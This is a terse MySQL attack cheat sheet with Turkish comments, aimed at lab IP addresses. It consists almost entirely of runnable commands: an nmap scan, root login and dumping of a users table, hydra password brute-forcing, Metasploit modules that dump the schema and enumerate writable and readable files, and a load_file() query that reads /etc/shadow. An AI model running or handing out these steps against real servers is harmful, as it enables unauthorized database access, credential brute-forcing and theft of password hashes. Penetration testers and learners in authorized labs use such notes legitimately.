nmap -v -sV -sC -p 3306 192.168.1.2
# Connect
mysql -h 192.168.1.2 -u root -p -D <DB>
# Veritabanları
show databases;
# Veritabanı seçer
use users;
# Tabloları listeler
show tables;
# Tablodaki verileri listeler
select * from users;
hydra -l root -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt 192.168.1.3 mysql
Veritabanı şemasını gösterir.
msfconsole
use auxiliary/scanner/mysql/mysql_schemadump
set RHOSTS 192.168.1.3
set USERNAME root
set PASSWORD ""
exploit
Sunucudaki hangi dosyaların yazılabilir olduğunu gösterir.
msfconsole
use auxiliary/scanner/mysql/mysql_writable_dirs
set DIR_LIST /usr/share/metasploit-framework/data/wordlists/directory.txt
set RHOSTS 192.168.1.3
set VERBOSE false
set USER root
set PASSWORD password123
exploit
Sunucudaki dosyaların hangilerinin okunabilir olduğunu gösterir.
msfconsole
use auxiliary/scanner/mysql/mysql_file_enum
set RHOSTS 192.168.1.3
set FILE_LIST /usr/share/metasploit-framework/data/wordlists/sensitive_files.txt
set USER root
set PASSWORD password123
exploit
Sunucudaki dosyayı okur.
mysql -h 192.168.1.3 -u root
select load_file("/etc/shadow");